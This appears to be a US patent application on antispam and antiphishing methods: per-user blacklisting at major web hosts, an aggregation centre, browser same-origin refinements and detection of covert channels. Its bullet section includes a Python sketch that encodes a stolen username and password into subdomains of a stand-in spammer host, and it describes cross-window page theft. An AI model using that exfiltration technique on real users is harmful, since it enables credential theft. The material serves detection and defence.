  • In these tests, the Agg can be considered to act as a specialized search engine. WH sends it an URL and essentially asks, "Have you seen this before?" and "Is it spam or phishing?". Here, of course, we are referring to the page pointed to by the URL, and not the URL itself. For the first question, the Agg might answer with a count of 0 or greater, where 0 means no canonical equivalent of the page has been seen before by the Agg, and 1 or greater means it has, and the number is the number of such pages in the BME.
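  • A sketch of the Agg's side of that first question, with the index structure assumed:

      def have_you_seen(page_hash, bme_index):
          # Returns 0 if no canonical equivalent of the page is known,
          # else the number of such pages in the matching BME.
          return len(bme_index.get(page_hash, ()))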
  • the Agg's reply might include URLs of some of those pages, which in general will be at different websites.
  • WH might specify if it wants these other URLs to be of other domains, or of its domain, or both. It might be just interested in matching URLs in its domain, because it controls these URLs, and can decide, for example, if those URLs and the URL that was sent to the Agg, might be taken offline.
  • WH submits a URL, and that page is a new BME to the Agg. It records this BME.
  • WH might be told by the Agg that its first URL's page has now been seen at other locations. So suppose the antispam analysis of the first page said it was inconclusive whether the page was spam or not. If later, WH is told that many copies exist, it may take this as an extra factor in re-evaluating whether the page is spam or not.
  • the Agg might not tell WH whenever every new instance of the page is seen.
  • the Agg or WH might have an agreed upon policy saying that WH be told only every 10 instances, say. Or, furthermore, that once WH has been told for that URL, that it no longer needs to be notified if more instances are seen by the Agg.
  • WH might have a policy of only submitting a subset of URLs to the Agg. For example, it might only do so for free users. Or for free users whose accounts have existed for less than 30 days.
  • the searching for similar BMEs might be something that the Agg does for its own internal analysis. Or perhaps WH might ask for this to be done, either if no exact match to its URL's page is found, or even if such an exact match is found. If so, then some subset of the similars might be sent to WH. Or the result of some function of those similars. For example, the function might simply tell WH that some number of similar BMEs or pages were found, across various websites. Here, the number of similar pages would be the sum of the totals of the pages in each of the similar BMEs.
  • a variant on the above idea of using an Agg is that different web hosts peer with each other, in order to exchange and use such information. This follows the idea in "0046" of various message providers exchanging BMEs derived from their message feeds, in order to better see which messages are bulk. There, the use of BMEs was to protect the privacy of the original messages. Here, this is less of an issue, since most of the URLs point to pages that will be or are already publicly available.
  • WH has a user who writes a page that is meant to sit behind a password. So the page is meant to appear only if the visitor has earlier furnished a valid username and password (or maybe just a password). Assume here that WH permits a user to have such pages and the password capability that these imply. For privacy reasons, if an Agg is used, WH might not wish to have it be able to read this page. (Though perhaps it might, according to its Terms of Service with its users.) Then, as in "0046" with messages, WH might have software that makes a BME out of the page, and sends the BME, instead of an URL, to the Agg.
  • the BME might be considered a degenerate BME, inasmuch as it wraps only one page. Then, the Agg looks in its data to see if it has any BME with the same hashes. If so, it replies accordingly to WH.
  • WH allows the immediate publication of its users' pages. But it then also does the above tests, or sends the URLs to the Agg to do so. And later, if a page is found to be spam or phishing, it is taken off the network. With possibly other pages by that user.
  • WH immediately publishes the pages. It wants to know from the Agg, as soon as possible, when these might be spam.
  • the spammer sends out a million messages, pointing to a given page, Rho, and that these messages reach their destinations at the instant that WH publishes Rho.
  • the limiting factor is a combination of these items: Not all the recipients will be currently logged in. Of those that are, not all will immediately read their mail.
  • antispam methods might put the message into a bulk folder, where it is less likely to be read promptly.
  • Rho For the latter, the response rate to spam is usually less than one percent. For a spammer to make money, Rho needs to be available for as long as possible, because of all these issues. At least several hours, preferably days. Hence, suppose WH gets a reply from the Agg that Rho is spam, and this takes 10 minutes, whereupon WH shuts down Rho. That interval is two orders of magnitude less than having Rho be up for a day or more. If the income that the spammer would get from Rho is roughly proportional to the time that Rho is accessible, up to some maximum time interval, then WH has reduced the income by two orders of magnitude. And this interval of 10 minutes is in turn two orders of magnitude longer than the typical response time of a general search engine.
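  • The orders-of-magnitude claim can be checked with simple arithmetic:

      seconds_per_day = 24 * 3600       # Rho available for roughly a day
      fast_takedown = 10 * 60           # Agg reply plus shutdown in about 10 minutes
      print(seconds_per_day // fast_takedown)   # 144, i.e. roughly two orders of magnitude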
  • the Agg also has an advantage, this time with respect to ISPs applying antispam methods against incoming messages.
  • a spammer sends out perhaps a million messages, that point to a page Rho at WH.
  • the Agg (or WH if it is not using the Agg) applies some antispam method against Rho. If essentially the same method is used by the ISPs which get the spam messages, then collectively those ISPs have to do a million times the computation done by the Agg (or WH).
  • Given the easier computational constraints on the Agg, compared to ISPs analyzing messages for spam, the Agg might thus be able to apply more intensive analysis, including, but not limited to, the following:
  • the Agg might follow links in the page, to see if the destinations are in a blacklist. Because of the possible relatively slow response when one goes out on the network via a link, this may be prohibitive when processing messages. But for pages, it may be feasible.
  • a spammer who writes a page might put an image, in which text is written as a bitmap. This evades content filters that operate on explicit text data. Some spam messages already do this, and it can be expected that spam pages might do likewise. Hence, the Agg might apply Optical Character Recognition methods against images in the page, to try and extract text. In general, for messages, this is too intensive and hence slow to be typically used.
  • SOP (Same Origin Policy) Security Manager
  • this problem is really two problems. First, being able to identify a web hosting site. Second, knowing a user's scope in the addressing scheme for that site. Hence, if the browser has a list of major web hosting sites, and those publish their f() mappings that define their users' scopes, then the browser could enforce an SOP that is now fine grained down to the level of each user. Here, the browser might either get f() directly from the sites, where its list of sites might be hardwired, or it might use an Agg.
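  • A sketch of the resulting fine-grained origin test; f() and base_domain are as discussed earlier, and their signatures here are assumed:

      def same_fine_grained_origin(url_a, url_b, f, base_domain):
          # Two pages share an origin only if both the base domain AND the
          # f()-derived user match, refining the usual per-domain SOP.
          return (base_domain(url_a), f(url_a)) == (base_domain(url_b), f(url_b))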
  • Sue's page has a form into which the visitor types some data. Mike might add or change that data, such that when it is submitted to WH's server, an attack (like a buffer overflow or SQL injection) is done.
  • the attack probes whether the WH server guards against these. Plus, if the server hands off the data to code that Sue supplies, the attack might be against that code.
  • Sue has pages that are not publicly viewable.
  • Sue requires a visitor to login with a username and password, using a page with https. Then, assuming the visitor logged in, subsequent pages also use https.
  • the SOP requires that both browser windows use the same protocol.
  • Mike might have his page with an https, but not require any login. Then his script can access another window with Sue's private pages.
  • Mike's code might "merely" copy those pages over the network to some address (probably outside wh.com) controlled by Mike.
  • the script might also actively alter the page or information submitted to it, in the manner described above.
  • Mike is attacking Sue or WH. He might also garner information about a visitor, without attacking Sue or WH. For example, if his script can read a form that the visitor fills in on Sue's page, that might have personal information about the visitor. Mike could harvest this, perhaps for identity fraud.
  • Another advantage of our countermeasure is that it can be done automatically, i.e. by default, by the browser. This gets around configuration policies that have to be set manually by someone at the browser. (Quite aside from current browsers not being able to handle the above steps in our method, which require knowledge of the user scope in a given hosting site.)
  • Bank0 might publish subdivisions of its web addresses, like "secure" and "market". These correspond to the users that we have discussed in the bulk of this Invention. Then, the browser, possibly using an Agg, might apply these subdivisions just as it did for users. Here, there would be a list of major banks, and each bank would publish this information about itself. The difference from a Partner List of "2245" is that this new information is about internal entities.
  • the spammer might attempt to write a scripting routine that sets the background color of the document. Possibly, if not probably, where the routine is written in a deliberately complex manner, to defy a trivial programmatic analysis that reveals the output color, where this analysis does not execute the routine.
  • a further refinement is to classify a Dynamic Style as Wrapped, Local or Remote.
  • a Wrapped Dynamic Style has a routine which only uses input values that are in the document.
  • a Local Dynamic Style has a routine which can also use input values that are derived from the machine running the routine, but not from other machines.
  • a Remote Dynamic Style can also use input values derived from other machines on the network.
  • a Local or Remote Dynamic Style might be prohibited by a given browser that runs the given language in which the style's routine is written.
  • a Local Dynamic Style might use the machine's clock as a seed value for a random number generator, for example.
  • a Remote Dynamic Style might access web pages or Web Services or data files on other machines. As cautioned in "1698", the remote machines that are accessed might or might not be under the control of the document's author. Hence, care should be taken about whether to add those machines to a blacklist or not. However, if a remote machine is already on a blacklist, then this could be used to make an extra style; one that suggests the document is bad.
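  • The three-way classification above, as a sketch (the enum names are assumed):

      from enum import Enum

      class DynamicStyle(Enum):
          WRAPPED = 1   # routine uses only input values in the document
          LOCAL = 2     # may also use values from the local machine (e.g. its clock)
          REMOTE = 3    # may also use values from other machines on the network

      def classify(uses_local_inputs, uses_remote_inputs):
          if uses_remote_inputs:
              return DynamicStyle.REMOTE
          return DynamicStyle.LOCAL if uses_local_inputs else DynamicStyle.WRAPPED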
  • the remote machine is a major web hosting site, which uses the main idea in this Invention of publishing the mapping from files to a user, f(). If the remote access is to a user on a blacklist, where this blacklist entry is done in the manner of Section 6, then we could make an extra style, in the fashion of the previous paragraph, to label the document as bad.
  • the user is not on a blacklist. Then, if from other styles or other analysis of the document, it is classified as bad (spam maybe), this can be used as a style that is attached to the user. To possibly decide if the user is bad.
  • the inference could be that the document author is the same as the user, and has written data into the user's pages, to be used by the document in its scripting routines; perhaps to avoid simple antispam analysis of that document.
  • a slave thread is executing a scripting routine, that turns out to be a Remote Dynamic Style.
  • it should emulate a browser if normally a browser would run the routine and pass information to the remote machine, indicating that the "agent" making the request is a browser. This prevents the remote machine from customizing its reply if it considers the agent to be an antispam entity, as opposed to a normal browser.
  • the thread runs the routine, and the routine calls a function that is normally available to it in a browser, asking for information about the local machine, then the thread should implement that function, and return a typical reply, as though it were a browser. This acts against the routine having logic that tries to determine if it is being run in an antispam thread.
  • Remote Dynamic Styles could be stopped, simply by prohibiting a document, when it is loaded by the browser, to run routines that do remote access. Or, if the document is a web page, to restrict remote access to only that page's domain. But in the long run, this policy may be too crude. As electronic messages and web pages become more complex, there may be an increasing trend to encode programmatic functionality into them. Instead of them being simple static documents. This increased functionality could well involve general access to the network. If so, then spammers can be expected to take advantage by making documents with various Remote Dynamic Styles.
  • a covert channel is a means by which malware running on a machine sends data to another machine, and the transmission is done in a manner to make this non-obvious to simple external inspection.
  • An elementary example involves web bugs or web beacons. This is where a spam message addressed to e.g. larry@somewhere.com has an <IMG> tag that loads an image from the spammer's domain. The URL in the tag has, to the right of the domain name, an encoding of that email address. So when Larry merely reads the message in his browser, the spammer knows that his email address is valid and active, because the spammer's web server log will show that URL request. In this example, there is no scripting. Each spam message is fully static.
  • a Remote Dynamic Style arises when a network address, either for incoming like the above, or for outgoing, like a clickable link, is made using a script.
  • the script may also, and probably will, encode information derived about the local computer or its user into the address. This might be done to the right of the spammer's domain name, as above. Or it might be done to the left.
  • the latter is a DNS covert channel. For example, suppose the spammer's domain is spammer.com. If she runs the DNS server for that domain, then any queries from anywhere on the Internet for a subdomain of it will come to her DNS server. The subdomains might be information found by her spam messages' scripting routines, encoded as valid domain name characters. So, if one of her messages' scripts runs and somehow finds a username ("lucy") and plaintext password ("dukim"), it might write an <IMG> tag whose source address carries both, encoded, as subdomains of spammer.com.
  • her DNS server can decode the username and password, possibly in conjunction with other information that is present in the address (maybe to the right of the domain name).
  • the DNS server can then return the raw address corresponding to spammer.com, regardless of the subdomain values.
  • her script would encode the data so that the encoded characters are valid in a domain name. This step was omitted above for simplicity; a sketch of one such encoding appears below.
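The following sketch shows one way that encoding step might look. Base32 is our choice for the example, since its output alphabet is legal in a DNS label; all names are hypothetical.

```python
import base64

def to_label(data: str) -> str:
    # base32 output is [A-Z2-7]; lowercased, it is valid in a DNS label.
    # (Labels are limited to 63 characters, so long data must be split.)
    return base64.b32encode(data.encode()).decode().rstrip("=").lower()

def covert_img_tag(username, password, domain="spammer.example"):
    host = "%s.%s.%s" % (to_label(username), to_label(password), domain)
    return '<IMG src="http://%s/x.gif">' % host

# The spammer's DNS server decodes the two leftmost labels, then answers
# with the fixed address for spammer.example regardless of their values.
print(covert_img_tag("lucy", "dukim"))
```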
  • the information encoded by the script might also be about data external to the computer on which the browser is running.
  • in Section 13 we discussed how a script loaded from a page at a web hosting site might access data about other pages from that site, which could exist in other windows of the browser. In general, those pages would belong to other users, and might not typically be publicly accessible.
  • the mechanism in this Section lets the spammer encode such information and pass it out over the network. Note that the dynamic address carrying this information need not go to the spammer's account at the web hosting site; in general, she could use another domain to receive the information.
  • a given BME is made from one or more messages (or web pages) that, after canonical steps are done, resolve down to the same hashes.
  • consider a BME. Each of its messages writes an address that goes into the same tag in the displayed messages. But we find that the addresses are different, though they share the same base domain of the spammer.
  • the different addresses might set a Boolean style suggesting a possible covert channel.
  • our slave process, which emulates a browser, might emulate different browsers. It might also emulate system clock times that differ by days. Plus, the emulation might extend to various other aspects of an operating system, like versions of that system, or different operating systems. If scripts arise that are virus-like, attempting to subvert an operating system and extract user data, then the slave might ultimately be a virtual operating system, with deliberately variable dummy user data across instances of the slave running different messages of a BME. Or, the slave might be the same virtual operating system, but with different dummy user data. Plus, the slave might emulate having other windows open, where those might be showing pages (perhaps simulated pages) from a web hosting site.
  • the tag is for an image
  • Another method avoids the use of BMEs. Instead, given a message with dynamic addresses, the slave might run it several times, each time possibly pretending to be a different operating system or to hold different data; see the sketch below.
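A sketch of this repeated-run check follows; run_in_slave() and base_domain_of() are assumed helpers, not functions specified by the Invention.

```python
def addresses_differ(message, emulations, run_in_slave, base_domain_of):
    """emulations: environments the slave pretends to be (different browsers,
    operating systems, clock times). run_in_slave(message, env) is assumed to
    return the addresses the message's scripts write into tags under env."""
    seen = set()
    for env in emulations:
        for addr in run_in_slave(message, env):
            seen.add(addr)
    domains = {base_domain_of(a) for a in seen}
    # Boolean style: many distinct addresses all resolving to one base domain
    # suggests a dynamically built, possibly covert, channel.
    return len(seen) > 1 and len(domains) == 1
```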
  • a Web Service is a computer program that accepts input from one or more computers on the network, and provides output to one or more computers on the network.
  • the input and output messages might be written in XML.
  • the input computers could be different from the output computers.
  • Another important characteristic is that Web Services are meant to be easily aggregated into larger Web Services; a building-block approach.
  • V designates a network address of WSH. (It could have several.) This address is presumed to uniquely distinguish WSH from other entities on the network, while the data to the right designates an identifier of the owner, presumed to be unique at WSH. The combination of these data uniquely specifies a given user at WSH with respect to any other users at any Web Service Hosting sites.
  • V is purely arbitrary.
  • WSH could apply analysis to Web Services that are to be posted on its site, to test for validity. Indeed, there is a market niche for some such sites to do intensive scrutiny and hence implicitly or explicitly validate that their Services are real. This might appear to obviate any need for our method.
  • Some instances of WSH might insist that, as a condition of usage, the source code is made available. This still presents the above analysis problems to WSH. But suppose that WSH does not insist on source code. Given an arbitrary executable, its testing cannot be guaranteed to be exhaustive. The Service might work correctly most of the time, but it could have triggers for malicious activity, and testing might not find these. Plus, if WSH hosts a wide variety of Services, then such testing might have to have a heavy manual component.
  • the network is not restricted to the Internet, but designates any type of electronic network in which Web Services are used. Plus, we have used the term Web Services in conformance with common parlance. But our method applies to programs that behave in this manner, even if the term Web Services is not commonly used to describe them.
  • IM: Instant Messaging.
  • bots: These are software programs that act as "users", interacting with human users via IM. Some bots might be run by the IM provider, and explicitly tell their interlocutors that they are bots. Other bots might be established by human users who are spammers, and who use these bots to send out many spams to other IM users. An IM provider might prohibit this as a matter of policy, which means that if it gets complaints about a user being a bot spammer, then it would eject that user. But it might also want a technical means of finding a bot, to minimize complaints from users.
  • the provider can apply our BME methods of "0046" to a sample of messages from its users.
  • the users might have an extension to their program that reads and writes IMs, which lets each user find BMEs and pool these in a p2p manner that preserves their privacy, since the original texts are not shared; only the canonical XML representations are.
  • the BMEs might be found only for messages received by users in a new "conversation". A bot has some ability to respond to users' replies; and since those replies could be any written text, so too might the bot's responses vary. So the latter might be low frequency messages, while its first set of messages (probably advertising something) is more likely to map into just a few BMEs (ideally just one).
  • the users can use the above method to find bots, and then complain to the provider and possibly add the bots to their blacklists of unwanted users. The latter might be done if the provider takes too long to remove the bot, or disagrees with the users' assessment that another user is a spam bot. A sketch of this first-message grouping appears below.
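A minimal sketch of this first-message grouping follows. Here canonicalize() is only a crude stand-in for the canonical steps of "0046", and the thresholds are invented for the example.

```python
import hashlib
from collections import defaultdict

def canonicalize(text: str) -> str:
    # Placeholder for the canonical steps of "0046"; a trivial normalization
    # so that the sketch runs.
    return " ".join(text.lower().split())

def suspected_bots(first_messages, min_convos=50, max_bmes=3):
    """first_messages: iterable of (sender, text) pairs, one per new
    conversation opened by the sender. Senders whose openers collapse into
    very few canonical groups across many conversations behave like bots."""
    hashes = defaultdict(set)   # sender -> set of canonical hashes
    counts = defaultdict(int)   # sender -> number of conversations seen
    for sender, text in first_messages:
        h = hashlib.sha256(canonicalize(text).encode()).hexdigest()
        hashes[sender].add(h)
        counts[sender] += 1
    return [s for s in counts
            if counts[s] >= min_convos and len(hashes[s]) <= max_bmes]
```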

Abstract

A spammer could try to avoid a blacklist of domains by using a large web hosting site to hold her pages. She sends out spam with links to these pages. An ISP might hesitate to block all messages linking to that prominent site. We define a small set of major web hosting sites. From each is deduced a mapping from an URL to the user whose page is pointed to by that URL. This mapping might be offered by the website via a Web Service, or it might be manually deduced. The website is not put into a blacklist. But a blacklist entry can be generalized to be the website's domain plus the offending user. This gives a precise blacklisting within a good website's domain. Existing antispam methods that use a blacklist can then apply this generalization with little or no change to those methods. The Web Service can also offer other information about the user, which can be used by antispam and antiphishing methods. The concept of web pages at a hosting site belonging to a given user can be applied by a search engine to improve its classification and rankings of those pages and of pages that they link to, or that link to them.

Description

SYSTEM AND METHOD FOR GENERALIZING AN ANTISPAM BLACKLIST
Field of the Invention This invention relates generally to information delivery and management in a computer network. More particularly, the invention relates to techniques for automatically classifying electronic communications as bulk versus non-bulk and categorizing the same.
Cross-References to Related Applications
This application claims the benefit of the filing date of U.S. Provisional Application, Number 60/766125, "System and Method for Generalizing an Antispam Blacklist", filed December 31, 2005. That Application is incorporated by reference in its entirety.
Background Art
For the background art, please refer to the References cited:
"JavaScript: The Complete Reference" by T Powell and F Schneider, McGraw-Hill 2004, ISBN 0072253576;
"Service-Oriented Architecture" by T Erl, Prentice-Hall 2004, ISBN 0131428985;
"J2EE Web Services" by R Monson-Haefel, Addison-Wesley 2003, ISBN 0321146182;
"Real World Web Services" by W Iverson, O'Reilly 2004, ISBN 059600642X.
Summary of the Invention
The foregoing has outlined some of the more pertinent objects and features of the present invention. These objects and features should be construed to be merely illustrative of some of the more prominent features and applications of the invention. Other beneficial results can be achieved by using the disclosed invention in a different manner or changing the invention as will be described. Thus, other objects and a fuller understanding of the invention may be had by referring to the following detailed description of the Preferred Embodiment.
A spammer could try to avoid a blacklist of domains by using a large web hosting site to hold her pages. She sends out spam with links to these pages. An ISP might hesitate to block all messages linking to that prominent site. We define a small set of major web hosting sites. From each is deduced a mapping from an URL to the user whose page is pointed to by that URL. This mapping might be offered by the website via a Web Service, or it might be manually deduced. The website is not put into a blacklist. But a blacklist entry can be generalized to be the website's domain plus the offending user. This gives a precise blacklisting within a good website's domain. Existing antispam methods that use a blacklist can then apply this generalization with little or no change to those methods. The Web Service can also offer other information about the user, which can be used by antispam and antiphishing methods.
The concept of web pages at a hosting site belonging to a given user can be applied by a search engine to improve its classification and rankings of those pages and of pages that they link to, or that link to them.
Brief Description of the Drawings
There is one drawing, Fig. 1.
Fig.1 shows a web page host (WH), a central web site (Agg), and a browser. It indicates how WH publishes a mapping f() to the Agg, which then makes it available to a browser, when the browser is visiting WH.
For a more complete understanding of the present invention and the advantages thereof, reference should be made to the following Detailed Description taken in connection with the accompanying drawing.
Detailed Description of the Preferred Embodiment What we claim as new and desire to secure by letters patent is set forth in the following claims.
In this Invention, we generalize what can go into a blacklist that is used against spam. In doing so, we expand the efficacy of the blacklist.
Below, we will refer to the following U.S. Provisionals submitted by us, where these concern primarily antispam methods: Number 60320046 ("0046"), "System and Method for the Classification of Electronic Communications", filed March 24, 2003; Number 60481745 ("1745"), "System and Method for the Algorithmic Categorization and Grouping of Electronic Communications", filed December 5, 2003; Number 60481789, "System and Method for the Algorithmic Disposition of Electronic Communications", filed December 14, 2003; Number 60481899, "Systems and Method for Advanced Statistical Categorization of Electronic Communications", filed January 15, 2004; Number 60521014 ("1014"), "Systems and Method for the Correlations of Electronic Communications", filed February 5, 2004; Number 60521174 ("1174"), "System and Method for Finding and Using Styles in Electronic Communications", filed March 3, 2004; Number 60521622 ("1622"), "System and Method for Using a Domain Cloaking to Correlate the Various Domains Related to Electronic Messages", filed June 7, 2004; Number 60521698 ("1698"), "System and Method Relating to Dynamically Constructed Addresses in Electronic Messages", filed June 20, 2004; Number 60521942 ("1942"), "System and Method to Categorize Electronic Messages by Graphical Analysis", filed July 23, 2004; Number 60522113 ("2113"), "System and Method to Detect Spammer Probe Accounts", filed August 17, 2004; Number 60522244 ("2244"), "System and Method to Rank Electronic Messages", filed September 7, 2004.
We will refer to these collectively as the "Antispam Provisionals".
We described a lightweight means of detecting phishing in electronic messages, or detecting fraudulent web sites in these earlier U.S. Provisionals: Number 60522245 ("2245"), "System and Method to Detect Phishing and Verify Electronic Advertising", filed September 7, 2004; Number 60522458 ("2458"), "System and Method for Enhanced Detection of Phishing", filed October 4, 2004; Number 60552528 ("2528"), "System and Method for Finding Message Bodies in Web-Displayed Messaging", filed October 11, 2004; Number 60552640 ("2640"), "System and Method for Investigating Phishing Websites", filed October 22, 2004; Number 60552644 ("2644"), "System and Method for Detecting Phishing Messages in Sparse Data Communications", filed October 24, 2004; Number 60593114, "System and Method of Blocking Pornographic Websites and Content", filed December 12, 2004; Number 60593115, "System and Method for Attacking Malware in Electronic Messages", filed December 12, 2004; Number 60593186, "System and Method for Making a Validated Search Engine", filed December 18, 2004.
We will refer to these collectively as the "Antiphishing Provisionals".
Below, we will often discuss a "user" who is a customer of a web hosting site, and has web pages at the site. "User" will also designate someone who is running a browser and visiting those pages. Where not explicitly labelled, the intended meaning of this word should be clear from the context.
Section
1. Country Domains
2. To the Right of the Domain
3. Extra User Information
4. URL Encoding
5. Redirect
6. Adding User to a Blacklist Entry
7. Aggregation Center
8. Blog Sites
9. Search Engine
10. Clusters
11. Antiphishing
12. Specialized Search Engine
13. Same Origin Policy
14. Dynamic Styles
15. Detection of Possible Covert Channels
16. Future Web Services
17. Instant Messaging Bots
18. Summary
1. Country Domains
In "0046", we explained how to use a blacklist against electronic messages; especially against links in the bodies. A key step there was the reduction of an electronic address, like a URL, or, equivalently, the domain withing such an address, to what we termed a
"base domain". So for example, an address like http://ape.bear.com/bin/testO would give a base domain ofbear.com.
In another example, a domain like mike.joe.tom155.net.au would give a base domain of tom155.net.au. It can be seen that a base domain is a reduction of the domain to some minimal set of fields on its right hand side. Sometimes this is two fields, as in bear.com; sometimes it is three, as in tom155.net.au.
In determining the number of fields, a key idea is the minimum number of fields in a domain that can be owned. So in the dot com Top Level Domain [TLD], this is two. But a problem arises with some country TLDs. A country like China, with TLD = cn, has subdomains com, edu, gov, mil, net and org. So Chinese domains with those subdomains would reduce to 3 fields in a base domain. But the organization that controls the Chinese TLD also sells domains that come directly off cn, like example111.cn. Hence, for countries that permit direct ownership off their TLDs, the mapping to a base domain becomes the following:
Find the set S of field names, drawn from {com, edu, gov, mil, net, org}, that occur directly to the left of the country TLD. Not all of these might exist for a given country. Also, these field names might differ from the above; for example, Japan's S = {co, ac, go, ne, or}. In practice, most countries that have a non-empty S use the naming conventions from one of these two sets.
There is another criterion for an entry to be in S. Let xx be an [imaginary] country TLD. Suppose com.xx exists. Does the registrar who controls xx routinely sell or otherwise allocate ownership of subdomains of com.xx? If so, then com belongs in S for xx. This step is to avoid the slight possibility that com.xx does not correspond to dot com, but is instead just a "regular" domain whose subdomains are not sold to others.
If S is empty, then all base domains for that country have two fields.
Suppose S is not empty. Let D be a domain that we are reducing to a base domain. Assume D ends in the country TLD that S is associated with. If the second field from the right in D is in S, then the base domain will have 3 fields, and we reduce D accordingly. Otherwise, D hangs directly off the country TLD, so its base domain is 2 fields, and we reduce it to this subset. A sketch of this reduction appears below.
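A sketch of this reduction in Python follows; the COUNTRY_S table is illustrative, not a complete registry of country conventions.

```python
# Map a country TLD to its set S of ownable second-level field names.
COUNTRY_S = {
    "cn": {"com", "edu", "gov", "mil", "net", "org"},
    "au": {"com", "edu", "gov", "net", "org"},
    "jp": {"co", "ac", "go", "ne", "or"},
}

def base_domain(domain: str) -> str:
    fields = domain.lower().split(".")
    s = COUNTRY_S.get(fields[-1], set())
    if s and len(fields) >= 3 and fields[-2] in s:
        return ".".join(fields[-3:])   # e.g. tom155.net.au
    return ".".join(fields[-2:])       # e.g. bear.com or example111.cn

assert base_domain("ape.bear.com") == "bear.com"
assert base_domain("mike.joe.tom155.net.au") == "tom155.net.au"
assert base_domain("example111.cn") == "example111.cn"
```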
2. To the Right of the Domain
For a URL, we show how we can, in some key cases, reduce it not just to a base domain, but to a base domain plus information to the right of it. The reason for doing this is the following. As blacklists have become widely used against body links in messages, spammers have sought to evade this. One method is for a spammer to use a website that is not her own domain. Instead, the spammer goes to a prominent web hosting site, which hosts on its own domain. The idea is that an ISP might be reluctant to blacklist that web hosting site, because of its importance; if it did so, its members who get messages from non-spammers using that website, with links to it, might be adversely affected.
We present a solution. Let us be an ISP or other message provider that seeks to detect and block spam. We draw up a list of prominent web hosting sites that host on their own domains; call this H. The small size of H is a key advantage. While there might be a degree of subjectivity in adding a site to H, we can restrict H's size to some relatively small number, probably less than 100. This is crucial, because a typical URL lets the information in its path, which is to the right of the domain, be interpreted in an essentially arbitrary manner by the web server at that domain. Let G be that path in the URL.
If we encounter a message with a link having a base domain not in H, then we treat it as in our Antispam Provisionals.
Now consider a message with an URL having a base domain in H. We want to map from G to its associated user, U, denoted as f(G)=U; Figure 1 is an example of one possible configuration. Here f depends on the given domain in H. In general, f is not simply the identity transformation, f(G)=G, because a user at the website might be able to specify an URL that points to an arbitrary file or directory owned by that user. This gives her degrees of freedom to generate numerous unique URLs. So we seek an operation analogous to mapping from a domain to a base domain, to remove these degrees of freedom.
There are several ways f() could be found. Firstly, by manually reviewing the website's documentation. This should often suffice. The website has an existing incentive to make the naming convention for its customers' URLs as simple for them to understand as possible. (Quite aside from the antispam context of this Invention.) Consider a website's customer. She writes various web pages, possibly with a directory structure. The writing of these might be aided by various editing tools provided by the website. Ultimately, she writes these pages so that they can be accessible on the web. So the address of a web page, even if it is autogenerated by the website, is typically straightforward to understand. Because, at the very least, there could be a debug cycle, where such an address, which is now a link in a message or external web page, breaks, or refers to a wrong file. So she has to go back to her web pages and resolve this.
Hence, a logical and simple example of G might be symbolically written as username + "/dir1/dir2/.../dirn/file0", where dir1, dir2, ..., dirn refer to a directory structure written by the customer, in which her file, here shown as file0, exists. (The above could also have arguments to the right of file0.) For the websites in H, it can be expected that several, if not most, use an f() that is recognizably equivalent to the above.
A second way to find f() is for the website to publish it as a Web Service, where the latter is usually written in XML. f() might contain instructions written in a computer language like C or C++, or even in a language like XSLT, so that we could access this Web Service, get f() and run it easily on our machines. A sketch of applying such an f() appears below.
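As a sketch under these assumptions, suppose wh.com uses the simple layout above, with the first path component naming the user. The ISP-side use of f() might then look like the following; the helper names are ours, and a real site may instead publish its own f() as a Web Service.

```python
from urllib.parse import urlparse

# H maps each hosting site's base domain to its f(); one illustrative entry.
H = {
    "wh.com": lambda path: path.strip("/").split("/")[0] if path.strip("/") else None,
}

def user_for_url(url):
    p = urlparse(url)
    base = ".".join(p.hostname.split(".")[-2:])   # crude; see Section 1
    f = H.get(base)
    return (base, f(p.path)) if f else None

print(user_for_url("http://wh.com/Zoltan/cheapPills/index.html"))
# ('wh.com', 'Zoltan')
```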
3. Extra User Information
An important generalization of f() is where it returns not just a single string representing the user, but also other data. These include, but are not limited to the following items:
a. A code whose values might take on these meanings - FREE = the user has a free account at the web host.
PAID = the user has a paid account.
VERIFIED = the user has a paid account and the user's identity has been verified by some means.
b. Complaints about the user. These might have been submitted to the web host by ISPs, or possibly by individual visitors to the user's pages. This information might be furnished as an absolute number of complaints.
c. When the user account was made. Typically, a spammer might open a free account that will exist for only a short time, until she sends out many spams and the web host gets enough complaints to shut down the account. So empirically, the older the account, the less the chance that it belongs to a spammer.
d. The number of pages written by the user. The greater the number, the less the chance, perhaps, that the user is a spammer. Typically, if a spammer's account will only exist for a short time, she might not invest much effort in maintaining many pages. Plus, some spammers have just one page, which is a redirect to another domain. (See Section 5 for a fuller discussion of redirects.) A spammer might try to get around this test by uploading many pages. In and of itself, making the spammer expend this extra effort is desirable from an antispam viewpoint.
e. Whether the user has pages with links to domains in a blacklist used by the web host. If so, the host might permit such pages to be written, but here it could provide a warning that these pages exist.
f. Whether the user has pages with links to a list of companies that are likely to be phishing targets. This list might have domains of banks and online auction sites. Also, it could have domains of companies that issue electronic seals, or do website validation. It has been noticed that phishing messages and pharming web pages might have actual links to the companies they are impersonating. Plus occasionally clickable images that are electronic seals, and which link to the companies issuing those seals.
g. Whether, for the previous two items, any page with links computes one or more addresses dynamically, instead of using simple static addresses. This applies the idea in "1698", that a spammer could use this to try to avoid detection by a blacklist.
h. If the user has pages that are accessed by a secure protocol like https. In practice, most pages at major web hosting sites do not use this. Its presence might suggest a possible phishing scenario where a page is pretending to be a secure login page at some bank. (Some web hosts might simply forbid users to require https to their pages.)
i. If the user has pages with our Notphish tag of "2458". This might be due to a valid usage. Or it might be due to a phisher writing invalid Notphish tags.
j. If the user has pages that involve the dynamic writing of various data, separate from the above discussion about dynamic addressing. For example, there might be the dynamic writing of the Notphish tag, to avoid the detection described in the previous item.
k. If the user has pages that offer downloading of files. There could be many valid reasons. But it could also possibly be an attempt at distributing malware.
l. When the user connects to the web host, is this from an address, or close to an address, from which previous users have done so, where those users later had their accounts closed for violating the host's Terms of Service?
m. The amounts of incoming and outgoing bandwidth consumed by people accessing the user's files in some (recent) time period. In addition or instead of this, the relative rankings of a user in incoming and outgoing consumption, across the website's users. The largest consumers might be interesting, for this is a measure of the popularity of a user.
n. For the page G in f(G), when was it last changed? Analogous to item (c), but instead of asking about the entire account, here it is just about G. Typically, the older G is, the more benign it might be. Presumably, the longer it has been accessible on the network while remaining accessible, the greater the chance that the host has received few (valid) complaints about it. A search engine might have an earlier spidering of G, so it can get an approximate value for this quantity; but that depends on its spidering frequency for G. Whereas the web host can readily have the real date available.
